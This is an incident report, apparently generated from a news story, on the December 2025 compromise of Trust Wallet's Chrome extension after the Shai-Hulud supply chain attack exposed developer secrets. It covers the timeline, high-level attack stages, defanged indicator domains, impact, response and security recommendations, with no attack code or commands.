Full Report
Trust Wallet on Tuesday revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, ultimately resulting in the theft of approximately $8.5 million in assets. "Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source
Analysis Summary
# Incident Report: Trust Wallet Chrome Extension Compromise via Supply Chain Attack
## Executive Summary
Trust Wallet experienced a significant security incident where an attacker exploited the second iteration of the Shai-Hulud supply chain attack to compromise their Google Chrome extension. This compromise was facilitated by the exposure of developer GitHub secrets, granting attackers access to source code and the Chrome Web Store (CWS) API key. The attacker subsequently pushed a trojanized extension to users, resulting in the theft of approximately \$8.5 million in cryptocurrency assets from over 2,500 addresses. Trust Wallet is now processing reimbursement claims and enhancing release process controls.
## Incident Details
- Discovery Date: Publicly reported shortly after malicious update push, leading to Trust Wallet's disclosure on Tuesday (implied December 30, 2025, based on article date Dec 31).
- Incident Date: Malicious update (v2.68) was pushed on December 24, 2025.
- Affected Organization: Trust Wallet
- Sector: Software/Cryptocurrency Wallet Services
- Geography: Undisclosed (Global user base affected)
## Timeline of Events
### Initial Access
- Date/Time: Prior to November 2025 / Sometime before Dec 24, 2025
- Vector: Supply Chain Attack (Shai-Hulud iteration 2) leading to credential exposure.
- Details: Trust Wallet developer GitHub secrets were exposed, likely due to the broader Shai-Hulud supply chain infection affecting developer tooling.
### Lateral Movement
- Date/Time: Following initial access.
- Vector: Exploitation of leaked GitHub secrets.
- Details: Attackers gained access to the browser extension source code and the Chrome Web Store (CWS) API key, thereby achieving high-level administrative access to the extension distribution channel.
### Data Exfiltration/Impact
- Date/Time: Beginning December 24, 2025 (or shortly after).
- Vector: Distribution of malicious extension update (v2.68).
- Details: The attacker used the CWS API key to push a trojanized version of the extension (v2.68) to users, registered using the domain "metrics-trustwallet[.]com" and served malicious builds from "api.metrics-trustwallet[.]com." This backdoor was capable of harvesting users' wallet mnemonic phrases. \$8.5 million in assets were drained from 2,520 wallets.
### Detection & Response
- Date/Time: December 24, 2025 (Malicious update pushed). Days later, Trust Wallet urged users to update.
- Vector: User reports/Internal detection following wallet draining activity.
- Details: Trust Wallet identified the issue, urged approximately 1 million users to update to version 2.69, and initiated a reimbursement claim process for victims.
## Attack Methodology
- Initial Access: Compromise of developer infrastructure through the Shai-Hulud software supply chain attack, leading to the exposure of GitHub secrets.
- Persistence: Not explicitly detailed, but sustained execution was achieved by pushing subsequent malicious updates via the compromised CWS API key.
- Privilege Escalation: Attackers achieved administrative control over the Chrome Extension deployment channel by obtaining the CWS API key.
- Defense Evasion: Ability to upload malicious builds directly via the API key bypassed Trust Wallet's standard release process (internal approval/manual review).
- Credential Access: Implied successful theft of development credentials (GitHub secrets) via the Shai-Hulud infection vector.
- Discovery: Not detailed, but likely reconnaissance of the compromised developer environment to locate API keys and source code.
- Lateral Movement: Movement from compromised developer machine/secrets to Trust Wallet's CI/CD or distribution controls (CWS).
- Collection: Installation of a backdoor into the extension capable of harvesting users' wallet mnemonic phrases.
- Exfiltration: The mnemonic phrases were used to drain assets from user wallets to attacker-controlled addresses.
- Impact: Direct financial theft of cryptocurrency assets.
## Impact Assessment
- Financial: Approximately **\$8.5 million** stolen across 2,520 victims. Trust Wallet is processing reimbursements.
- Data Breach: Wallet mnemonic phrases (highly sensitive cryptographic recovery information) were exfiltrated from users.
- Operational: Forced emergency update rollout (v2.68 to v2.69) and temporary loss of integrity over the browser extension distribution pipeline.
- Reputational: Significant damage due to the high-profile theft and the reliance on a high-severity supply chain compromise to execute the final payload.
## Indicators of Compromise
- Network Indicators (Defanged): `metrics-trustwallet[.]com`, `api.metrics-trustwallet[.]com` (likely used for C2 or payload delivery).
- File Indicators: Trojanized browser extension build (v2.68) containing a specific backdoor mechanism.
- Behavioral Indicators: Unauthorized uploads to the Chrome Web Store bypassing standard release procedures; unexpected asset transfers from user wallets following extension update.
## Response Actions
- Containment: Urged approximately 1 million users to immediately update the Chrome extension to version 2.69.
- Eradication: Revocation/rotation of compromised GitHub secrets and the CWS API key (implicit due to the incident stopping after the update patch).
- Recovery: Initiated a case-by-case reimbursement claim process for impacted victims. Enhanced monitoring and controls around the release process.
## Lessons Learned
- Developer secrets security is paramount: Leakage of secrets via supply chain attacks (like Shai-Hulud) provides direct, high-trust access to production distribution channels.
- Reliance on API keys: Full CWS API access granted elevated privileges that allowed bypassing critical internal approval gates.
- Supply Chain Risk: Industry-wide software supply chain attacks (like Shai-Hulud) represent a significant indirect threat vector requiring security measures beyond typical application defenses.
## Recommendations
- Implement stringent Secret Management policies, potentially including short-lived tokens or role-based access, especially for API keys used for production deployments.
- Enhance source control security via stronger MFA, dedicated hardware security keys, and continuous monitoring for unusual access patterns (especially concerning developer machines known to be targeted by developer-focused malware like Shai-Hulud).
- Introduce multi-party authorization requirements or tamper-proof signing mechanisms for all production software builds, ensuring no single leaked key can grant unauthorized deployment capability.